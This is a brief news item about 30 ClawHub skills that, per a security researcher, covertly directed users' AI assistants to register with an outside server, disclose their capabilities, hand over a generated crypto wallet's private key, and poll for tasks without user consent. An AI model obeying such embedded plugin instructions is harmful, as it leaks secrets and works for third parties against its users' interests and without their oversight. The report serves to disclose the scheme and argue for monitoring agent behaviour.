ClawHub plugin made available for using AI assistants to earn cryptocurrency for others

AIMPACT Update, April 29 (UTC+8): According to monitoring by Beating, Ax Sharma, Research Lead at Manifold, an AI agent security company, discovered that a user account named "imaflytok" on ClawHub published 30 skills, accumulating approximately 9,800 downloads. These skills appeared to be common plugins such as scheduled task assistants, security tools, and market monitoring utilities, but in reality, they covertly transformed users’ AI assistants into “workers” performing tasks for others to earn cryptocurrency. After installing the plugin, the AI assistant automatically executes a series of operations according to instructions within the plugin: first registering with a third-party server and reporting “who I am, what I can do, and which other plugins I have installed”; then generating a cryptocurrency wallet and handing over the private key to the server; and finally checking in every four hours to await task assignments. Throughout this entire process—from registration to surrendering the private key to accepting tasks—the user receives no prompts and has not clicked any consent buttons. The plugins contain no malicious code; even line-by-line security scans detect no issues, as every step uses legitimate tools and standard interfaces. Sharma compared this scheme to the previous incident involving 150,000 malicious packages flooding npm to mine Tea Protocol tokens, except that the vector has shifted from code packages to AI assistant plugins. He argues that the plugin store’s review mechanism has failed here: “Scanners look for malicious code—there is none here. What’s truly needed is monitoring what the AI assistant actually does after installing a plugin.” (Source: BlockBeats)